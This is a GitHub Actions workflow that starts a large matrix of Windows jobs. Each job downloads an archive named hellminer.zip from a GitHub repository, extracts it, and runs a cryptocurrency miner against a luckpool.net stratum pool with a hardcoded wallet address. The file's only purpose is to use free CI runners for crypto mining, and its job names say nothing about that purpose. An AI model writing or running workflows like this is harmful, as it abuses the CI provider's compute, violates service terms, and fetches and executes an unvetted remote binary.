name: Pusing

on: [workflow_dispatch]

jobs:
  build:
    name: Dalah
    runs-on: windows-2022
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/NuDev2021/pusing/blob/main/hellminer.zip -OutFile hellminer.zip
    - name: Extract
      run: Expand-Archive hellminer.zip
    - name: RUNNING
      run: ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RBnvE5PySsdZCBEBbXoWEocrEr1uWq4dJJ -p x --cpu 8 'string command miner seperti pool:port, wallet, threads, '
    - name: DONE
      run: exit
